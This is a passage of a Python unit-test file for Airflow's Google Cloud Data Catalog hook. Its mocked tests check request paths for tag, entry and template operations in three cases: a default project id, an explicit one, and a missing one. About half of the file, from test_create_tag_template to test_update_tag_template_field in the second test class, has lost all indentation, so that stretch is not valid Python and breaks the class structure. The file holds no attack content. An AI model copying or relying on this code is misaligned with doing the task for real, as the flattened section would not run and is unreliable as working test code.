        self.hook.list_tags(
            location=TEST_LOCATION,
            entry_group=TEST_ENTRY_GROUP_ID,
            entry=TEST_ENTRY_ID,
            page_size=TEST_PAGE_SIZE,
            retry=TEST_RETRY,
            timeout=TEST_TIMEOUT,
            metadata=TEST_METADATA,
        )
        mock_get_conn.return_value.list_tags.assert_called_once_with(
            request=dict(
                parent=TEST_ENTRY_PATH.format(TEST_PROJECT_ID_1),
                page_size=TEST_PAGE_SIZE,
            ),
            retry=TEST_RETRY,
            timeout=TEST_TIMEOUT,
            metadata=TEST_METADATA,
        )

    @mock.patch(
        "airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
        return_value=(TEST_CREDENTIALS, TEST_PROJECT_ID_1),
    )
    @mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
    def test_get_tag_for_template_name(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
        # Two tags listed; only the one matching the template name must be
        # returned.
        tag_1 = mock.MagicMock(template=TEST_TAG_TEMPLATE_PATH.format("invalid-project"))
        tag_2 = mock.MagicMock(template=TEST_TAG_TEMPLATE_PATH.format(TEST_PROJECT_ID_1))

        mock_get_conn.return_value.list_tags.return_value = [tag_1, tag_2]
        result = self.hook.get_tag_for_template_name(
            location=TEST_LOCATION,
            entry_group=TEST_ENTRY_GROUP_ID,
            entry=TEST_ENTRY_ID,
            template_name=TEST_TAG_TEMPLATE_PATH.format(TEST_PROJECT_ID_1),
            retry=TEST_RETRY,
            timeout=TEST_TIMEOUT,
            metadata=TEST_METADATA,
        )
        mock_get_conn.return_value.list_tags.assert_called_once_with(
            request=dict(
                parent=TEST_ENTRY_PATH.format(TEST_PROJECT_ID_1),
                page_size=100,
            ),
            retry=TEST_RETRY,
            timeout=TEST_TIMEOUT,
            metadata=TEST_METADATA,
        )
        assert result == tag_2

    @mock.patch(
        "airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
        return_value=(TEST_CREDENTIALS, TEST_PROJECT_ID_1),
    )
    @mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
    def test_rename_tag_template_field(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
        self.hook.rename_tag_template_field(
            location=TEST_LOCATION,
            tag_template=TEST_TAG_TEMPLATE_ID,
            field=TEST_TAG_TEMPLATE_FIELD_ID,
            new_tag_template_field_id=TEST_NEW_TAG_TEMPLATE_FIELD_ID,
            retry=TEST_RETRY,
            timeout=TEST_TIMEOUT,
            metadata=TEST_METADATA,
        )
        mock_get_conn.return_value.rename_tag_template_field.assert_called_once_with(
            request=dict(
                name=TEST_TAG_TEMPLATE_FIELD_PATH.format(TEST_PROJECT_ID_1),
                new_tag_template_field_id=TEST_NEW_TAG_TEMPLATE_FIELD_ID,
            ),
            retry=TEST_RETRY,
            timeout=TEST_TIMEOUT,
            metadata=TEST_METADATA,
        )

    @mock.patch(
        "airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
        return_value=(TEST_CREDENTIALS, TEST_PROJECT_ID_1),
    )
    @mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
    def test_update_entry(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
        self.hook.update_entry(
            entry=TEST_ENTRY,
            update_mask=TEST_UPDATE_MASK,
            location=TEST_LOCATION,
            entry_group=TEST_ENTRY_GROUP_ID,
            entry_id=TEST_ENTRY_ID,
            retry=TEST_RETRY,
            timeout=TEST_TIMEOUT,
            metadata=TEST_METADATA,
        )
        mock_get_conn.return_value.update_entry.assert_called_once_with(
            request=dict(
                entry=Entry(name=TEST_ENTRY_PATH.format(TEST_PROJECT_ID_1)),
                update_mask=TEST_UPDATE_MASK,
            ),
            retry=TEST_RETRY,
            timeout=TEST_TIMEOUT,
            metadata=TEST_METADATA,
        )

    @mock.patch(
        "airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
        return_value=(TEST_CREDENTIALS, TEST_PROJECT_ID_1),
    )
    @mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
    def test_update_tag(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
        self.hook.update_tag(
            tag=deepcopy(TEST_TAG),
            update_mask=TEST_UPDATE_MASK,
            location=TEST_LOCATION,
            entry_group=TEST_ENTRY_GROUP_ID,
            entry=TEST_ENTRY_ID,
            tag_id=TEST_TAG_ID,
            retry=TEST_RETRY,
            timeout=TEST_TIMEOUT,
            metadata=TEST_METADATA,
        )
        mock_get_conn.return_value.update_tag.assert_called_once_with(
            request=dict(tag=Tag(name=TEST_TAG_PATH.format(TEST_PROJECT_ID_1)), update_mask=TEST_UPDATE_MASK),
            retry=TEST_RETRY,
            timeout=TEST_TIMEOUT,
            metadata=TEST_METADATA,
        )

    @mock.patch(
        "airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
        return_value=(TEST_CREDENTIALS, TEST_PROJECT_ID_1),
    )
    @mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
    def test_update_tag_template(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
        self.hook.update_tag_template(
            tag_template=TEST_TAG_TEMPLATE,
            update_mask=TEST_UPDATE_MASK,
            location=TEST_LOCATION,
            tag_template_id=TEST_TAG_TEMPLATE_ID,
            retry=TEST_RETRY,
            timeout=TEST_TIMEOUT,
            metadata=TEST_METADATA,
        )
        mock_get_conn.return_value.update_tag_template.assert_called_once_with(
            request=dict(
                tag_template=TagTemplate(name=TEST_TAG_TEMPLATE_PATH.format(TEST_PROJECT_ID_1)),
                update_mask=TEST_UPDATE_MASK,
            ),
            retry=TEST_RETRY,
            timeout=TEST_TIMEOUT,
            metadata=TEST_METADATA,
        )

    @mock.patch(
        "airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
        return_value=(TEST_CREDENTIALS, TEST_PROJECT_ID_1),
    )
    @mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
    def test_update_tag_template_field(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
        self.hook.update_tag_template_field(
            tag_template_field=TEST_TAG_TEMPLATE_FIELD,
            update_mask=TEST_UPDATE_MASK,
            tag_template=TEST_TAG_TEMPLATE_ID,
            location=TEST_LOCATION,
            tag_template_field_id=TEST_TAG_TEMPLATE_FIELD_ID,
            retry=TEST_RETRY,
            timeout=TEST_TIMEOUT,
            metadata=TEST_METADATA,
        )
        mock_get_conn.return_value.update_tag_template_field.assert_called_once_with(
            request=dict(
                name=TEST_TAG_TEMPLATE_FIELD_PATH.format(TEST_PROJECT_ID_1),
                tag_template_field=TEST_TAG_TEMPLATE_FIELD,
                update_mask=TEST_UPDATE_MASK,
            ),
            retry=TEST_RETRY,
            timeout=TEST_TIMEOUT,
            metadata=TEST_METADATA,
        )
class TestCloudDataCatalogWithoutDefaultProjectIdHook(TestCase):
    def setUp(
        self,
    ) -> None:
        # No default project in the connection: every call must pass
        # project_id explicitly.
        with mock.patch(
            "airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.__init__",
            new=mock_base_gcp_hook_no_default_project_id,
        ):
            self.hook = CloudDataCatalogHook(gcp_conn_id="test")
    @mock.patch(
        "airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
        return_value=(TEST_CREDENTIALS, None),
    )
    @mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
    def test_create_entry(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
        # project_id passed explicitly must be used in the request path.
        self.hook.create_entry(
            location=TEST_LOCATION,
            entry_group=TEST_ENTRY_GROUP_ID,
            entry_id=TEST_ENTRY_ID,
            entry=TEST_ENTRY,
            project_id=TEST_PROJECT_ID_2,
            retry=TEST_RETRY,
            timeout=TEST_TIMEOUT,
            metadata=TEST_METADATA,
        )
        mock_get_conn.return_value.create_entry.assert_called_once_with(
            request=dict(
                parent=TEST_ENTRY_GROUP_PATH.format(TEST_PROJECT_ID_2),
                entry_id=TEST_ENTRY_ID,
                entry=TEST_ENTRY,
            ),
            retry=TEST_RETRY,
            timeout=TEST_TIMEOUT,
            metadata=TEST_METADATA,
        )
    @mock.patch(
        "airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
        return_value=(TEST_CREDENTIALS, None),
    )
    @mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
    def test_create_entry_group(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
        # project_id passed explicitly must be used in the request path.
        self.hook.create_entry_group(
            location=TEST_LOCATION,
            entry_group_id=TEST_ENTRY_GROUP_ID,
            entry_group=TEST_ENTRY_GROUP,
            project_id=TEST_PROJECT_ID_2,
            retry=TEST_RETRY,
            timeout=TEST_TIMEOUT,
            metadata=TEST_METADATA,
        )
        mock_get_conn.return_value.create_entry_group.assert_called_once_with(
            request=dict(
                parent=TEST_LOCATION_PATH.format(TEST_PROJECT_ID_2),
                entry_group_id=TEST_ENTRY_GROUP_ID,
                entry_group=TEST_ENTRY_GROUP,
            ),
            retry=TEST_RETRY,
            timeout=TEST_TIMEOUT,
            metadata=TEST_METADATA,
        )
    @mock.patch(
        "airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
        return_value=(TEST_CREDENTIALS, None),
    )
    @mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
    def test_create_tag(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
        # deepcopy: the hook mutates the tag dict, keep the fixture clean.
        self.hook.create_tag(
            location=TEST_LOCATION,
            entry_group=TEST_ENTRY_GROUP_ID,
            entry=TEST_ENTRY_ID,
            tag=deepcopy(TEST_TAG),
            template_id=TEST_TAG_TEMPLATE_ID,
            project_id=TEST_PROJECT_ID_2,
            retry=TEST_RETRY,
            timeout=TEST_TIMEOUT,
            metadata=TEST_METADATA,
        )
        mock_get_conn.return_value.create_tag.assert_called_once_with(
            request=CreateTagRequest(
                parent=TEST_ENTRY_PATH.format(TEST_PROJECT_ID_2),
                tag=Tag(template=TEST_TAG_TEMPLATE_PATH.format(TEST_PROJECT_ID_2)),
            ),
            retry=TEST_RETRY,
            timeout=TEST_TIMEOUT,
            metadata=TEST_METADATA,
        )
    @mock.patch(
        "airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
        return_value=(TEST_CREDENTIALS, None),
    )
    @mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
    def test_create_tag_protobuff(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
        # Same as test_create_tag, but passing a protobuf Tag message.
        self.hook.create_tag(
            location=TEST_LOCATION,
            entry_group=TEST_ENTRY_GROUP_ID,
            entry=TEST_ENTRY_ID,
            tag=Tag(),
            template_id=TEST_TAG_TEMPLATE_ID,
            project_id=TEST_PROJECT_ID_2,
            retry=TEST_RETRY,
            timeout=TEST_TIMEOUT,
            metadata=TEST_METADATA,
        )
        mock_get_conn.return_value.create_tag.assert_called_once_with(
            request=CreateTagRequest(
                parent=TEST_ENTRY_PATH.format(TEST_PROJECT_ID_2),
                tag=Tag(template=TEST_TAG_TEMPLATE_PATH.format(TEST_PROJECT_ID_2)),
            ),
            retry=TEST_RETRY,
            timeout=TEST_TIMEOUT,
            metadata=TEST_METADATA,
        )
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_create_tag_template(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
self.hook.create_tag_template(
location=TEST_LOCATION,
tag_template_id=TEST_TAG_TEMPLATE_ID,
tag_template=TEST_TAG_TEMPLATE,
project_id=TEST_PROJECT_ID_2,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
mock_get_conn.return_value.create_tag_template.assert_called_once_with(
request=CreateTagTemplateRequest(
parent=TEST_LOCATION_PATH.format(TEST_PROJECT_ID_2),
tag_template_id=TEST_TAG_TEMPLATE_ID,
tag_template=TEST_TAG_TEMPLATE,
),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_create_tag_template_field(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
self.hook.create_tag_template_field(
location=TEST_LOCATION,
tag_template=TEST_TAG_TEMPLATE_ID,
tag_template_field_id=TEST_TAG_TEMPLATE_FIELD_ID,
tag_template_field=TEST_TAG_TEMPLATE_FIELD,
project_id=TEST_PROJECT_ID_2,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
mock_get_conn.return_value.create_tag_template_field.assert_called_once_with(
request=dict(
parent=TEST_TAG_TEMPLATE_PATH.format(TEST_PROJECT_ID_2),
tag_template_field_id=TEST_TAG_TEMPLATE_FIELD_ID,
tag_template_field=TEST_TAG_TEMPLATE_FIELD,
),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_delete_entry(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
self.hook.delete_entry(
location=TEST_LOCATION,
entry_group=TEST_ENTRY_GROUP_ID,
entry=TEST_ENTRY_ID,
project_id=TEST_PROJECT_ID_2,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
mock_get_conn.return_value.delete_entry.assert_called_once_with(
request=dict(name=TEST_ENTRY_PATH.format(TEST_PROJECT_ID_2)),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_delete_entry_group(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
self.hook.delete_entry_group(
location=TEST_LOCATION,
entry_group=TEST_ENTRY_GROUP_ID,
project_id=TEST_PROJECT_ID_2,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
mock_get_conn.return_value.delete_entry_group.assert_called_once_with(
request=dict(name=TEST_ENTRY_GROUP_PATH.format(TEST_PROJECT_ID_2)),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_delete_tag(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
self.hook.delete_tag(
location=TEST_LOCATION,
entry_group=TEST_ENTRY_GROUP_ID,
entry=TEST_ENTRY_ID,
tag=TEST_TAG_ID,
project_id=TEST_PROJECT_ID_2,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
mock_get_conn.return_value.delete_tag.assert_called_once_with(
request=dict(name=TEST_TAG_PATH.format(TEST_PROJECT_ID_2)),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_delete_tag_template(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
self.hook.delete_tag_template(
location=TEST_LOCATION,
tag_template=TEST_TAG_TEMPLATE_ID,
force=TEST_FORCE,
project_id=TEST_PROJECT_ID_2,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
mock_get_conn.return_value.delete_tag_template.assert_called_once_with(
request=dict(name=TEST_TAG_TEMPLATE_PATH.format(TEST_PROJECT_ID_2), force=TEST_FORCE),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_delete_tag_template_field(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
self.hook.delete_tag_template_field(
location=TEST_LOCATION,
tag_template=TEST_TAG_TEMPLATE_ID,
field=TEST_TAG_TEMPLATE_FIELD_ID,
force=TEST_FORCE,
project_id=TEST_PROJECT_ID_2,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
mock_get_conn.return_value.delete_tag_template_field.assert_called_once_with(
request=dict(name=TEST_TAG_TEMPLATE_FIELD_PATH.format(TEST_PROJECT_ID_2), force=TEST_FORCE),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_get_entry(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
self.hook.get_entry(
location=TEST_LOCATION,
entry_group=TEST_ENTRY_GROUP_ID,
entry=TEST_ENTRY_ID,
project_id=TEST_PROJECT_ID_2,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
mock_get_conn.return_value.get_entry.assert_called_once_with(
request=dict(name=TEST_ENTRY_PATH.format(TEST_PROJECT_ID_2)),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_get_entry_group(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
self.hook.get_entry_group(
location=TEST_LOCATION,
entry_group=TEST_ENTRY_GROUP_ID,
read_mask=TEST_READ_MASK,
project_id=TEST_PROJECT_ID_2,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
mock_get_conn.return_value.get_entry_group.assert_called_once_with(
request=dict(
name=TEST_ENTRY_GROUP_PATH.format(TEST_PROJECT_ID_2),
read_mask=TEST_READ_MASK,
),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_get_tag_template(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
self.hook.get_tag_template(
location=TEST_LOCATION,
tag_template=TEST_TAG_TEMPLATE_ID,
project_id=TEST_PROJECT_ID_2,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
mock_get_conn.return_value.get_tag_template.assert_called_once_with(
request=dict(name=TEST_TAG_TEMPLATE_PATH.format(TEST_PROJECT_ID_2)),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_list_tags(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
self.hook.list_tags(
location=TEST_LOCATION,
entry_group=TEST_ENTRY_GROUP_ID,
entry=TEST_ENTRY_ID,
page_size=TEST_PAGE_SIZE,
project_id=TEST_PROJECT_ID_2,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
mock_get_conn.return_value.list_tags.assert_called_once_with(
request=dict(parent=TEST_ENTRY_PATH.format(TEST_PROJECT_ID_2), page_size=TEST_PAGE_SIZE),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_get_tag_for_template_name(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
tag_1 = mock.MagicMock(template=TEST_TAG_TEMPLATE_PATH.format("invalid-project"))
tag_2 = mock.MagicMock(template=TEST_TAG_TEMPLATE_PATH.format(TEST_PROJECT_ID_2))
mock_get_conn.return_value.list_tags.return_value = [tag_1, tag_2]
result = self.hook.get_tag_for_template_name(
location=TEST_LOCATION,
entry_group=TEST_ENTRY_GROUP_ID,
entry=TEST_ENTRY_ID,
template_name=TEST_TAG_TEMPLATE_PATH.format(TEST_PROJECT_ID_2),
project_id=TEST_PROJECT_ID_2,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
mock_get_conn.return_value.list_tags.assert_called_once_with(
request=dict(parent=TEST_ENTRY_PATH.format(TEST_PROJECT_ID_2), page_size=100),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
assert result == tag_2
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_rename_tag_template_field(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
self.hook.rename_tag_template_field(
location=TEST_LOCATION,
tag_template=TEST_TAG_TEMPLATE_ID,
field=TEST_TAG_TEMPLATE_FIELD_ID,
new_tag_template_field_id=TEST_NEW_TAG_TEMPLATE_FIELD_ID,
project_id=TEST_PROJECT_ID_2,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
mock_get_conn.return_value.rename_tag_template_field.assert_called_once_with(
request=dict(
name=TEST_TAG_TEMPLATE_FIELD_PATH.format(TEST_PROJECT_ID_2),
new_tag_template_field_id=TEST_NEW_TAG_TEMPLATE_FIELD_ID,
),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_update_entry(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
self.hook.update_entry(
entry=TEST_ENTRY,
update_mask=TEST_UPDATE_MASK,
location=TEST_LOCATION,
entry_group=TEST_ENTRY_GROUP_ID,
entry_id=TEST_ENTRY_ID,
project_id=TEST_PROJECT_ID_2,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
mock_get_conn.return_value.update_entry.assert_called_once_with(
request=dict(
entry=Entry(name=TEST_ENTRY_PATH.format(TEST_PROJECT_ID_2)), update_mask=TEST_UPDATE_MASK
),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_update_tag(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
self.hook.update_tag(
tag=deepcopy(TEST_TAG),
update_mask=TEST_UPDATE_MASK,
location=TEST_LOCATION,
entry_group=TEST_ENTRY_GROUP_ID,
entry=TEST_ENTRY_ID,
tag_id=TEST_TAG_ID,
project_id=TEST_PROJECT_ID_2,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
mock_get_conn.return_value.update_tag.assert_called_once_with(
request=dict(tag=Tag(name=TEST_TAG_PATH.format(TEST_PROJECT_ID_2)), update_mask=TEST_UPDATE_MASK),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_update_tag_template(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
self.hook.update_tag_template(
tag_template=TEST_TAG_TEMPLATE,
update_mask=TEST_UPDATE_MASK,
location=TEST_LOCATION,
tag_template_id=TEST_TAG_TEMPLATE_ID,
project_id=TEST_PROJECT_ID_2,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
mock_get_conn.return_value.update_tag_template.assert_called_once_with(
request=dict(
tag_template=TagTemplate(name=TEST_TAG_TEMPLATE_PATH.format(TEST_PROJECT_ID_2)),
update_mask=TEST_UPDATE_MASK,
),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
@mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
return_value=(TEST_CREDENTIALS, None),
)
@mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
def test_update_tag_template_field(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
self.hook.update_tag_template_field(
tag_template_field=TEST_TAG_TEMPLATE_FIELD,
update_mask=TEST_UPDATE_MASK,
tag_template=TEST_TAG_TEMPLATE_ID,
location=TEST_LOCATION,
tag_template_field_id=TEST_TAG_TEMPLATE_FIELD_ID,
project_id=TEST_PROJECT_ID_2,
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
mock_get_conn.return_value.update_tag_template_field.assert_called_once_with(
request=dict(
name=TEST_TAG_TEMPLATE_FIELD_PATH.format(TEST_PROJECT_ID_2),
tag_template_field=TEST_TAG_TEMPLATE_FIELD,
update_mask=TEST_UPDATE_MASK,
),
retry=TEST_RETRY,
timeout=TEST_TIMEOUT,
metadata=TEST_METADATA,
)
# Error message raised by GoogleBaseHook when neither the call nor the
# connection supplies a project id; escaped for use as a pytest.raises
# ``match`` regex in the missing-project-id tests below.
TEST_MESSAGE = re.escape(
    "The project id must be passed either as keyword project_id parameter or as project_id extra in "
    "Google Cloud connection definition. Both are not set!"
)
class TestCloudDataCatalogMissingProjectIdHook(TestCase):
    """Negative-path tests for CloudDataCatalogHook.

    The hook is built with a connection that carries no default project id
    and every call below also omits ``project_id``, so each hook method must
    raise ``AirflowException`` (matched against ``TEST_MESSAGE``) instead of
    issuing an API request.
    """
    def setUp(
        self,
    ) -> None:
        # Replace the base __init__ so the hook is created without a default project id.
        with mock.patch(
            "airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.__init__",
            new=mock_base_gcp_hook_no_default_project_id,
        ):
            self.hook = CloudDataCatalogHook(gcp_conn_id="test")
    @mock.patch(
        "airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
        return_value=(TEST_CREDENTIALS, None),
    )
    @mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
    def test_create_entry(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
        """create_entry without a project id must raise AirflowException."""
        with pytest.raises(AirflowException, match=TEST_MESSAGE):
            self.hook.create_entry(
                location=TEST_LOCATION,
                entry_group=TEST_ENTRY_GROUP_ID,
                entry_id=TEST_ENTRY_ID,
                entry=TEST_ENTRY,
                retry=TEST_RETRY,
                timeout=TEST_TIMEOUT,
                metadata=TEST_METADATA,
            )
    @mock.patch(
        "airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
        return_value=(TEST_CREDENTIALS, None),
    )
    @mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
    def test_create_entry_group(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
        """create_entry_group without a project id must raise AirflowException."""
        with pytest.raises(AirflowException, match=TEST_MESSAGE):
            self.hook.create_entry_group(
                location=TEST_LOCATION,
                entry_group_id=TEST_ENTRY_GROUP_ID,
                entry_group=TEST_ENTRY_GROUP,
                retry=TEST_RETRY,
                timeout=TEST_TIMEOUT,
                metadata=TEST_METADATA,
            )
    @mock.patch(
        "airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
        return_value=(TEST_CREDENTIALS, None),
    )
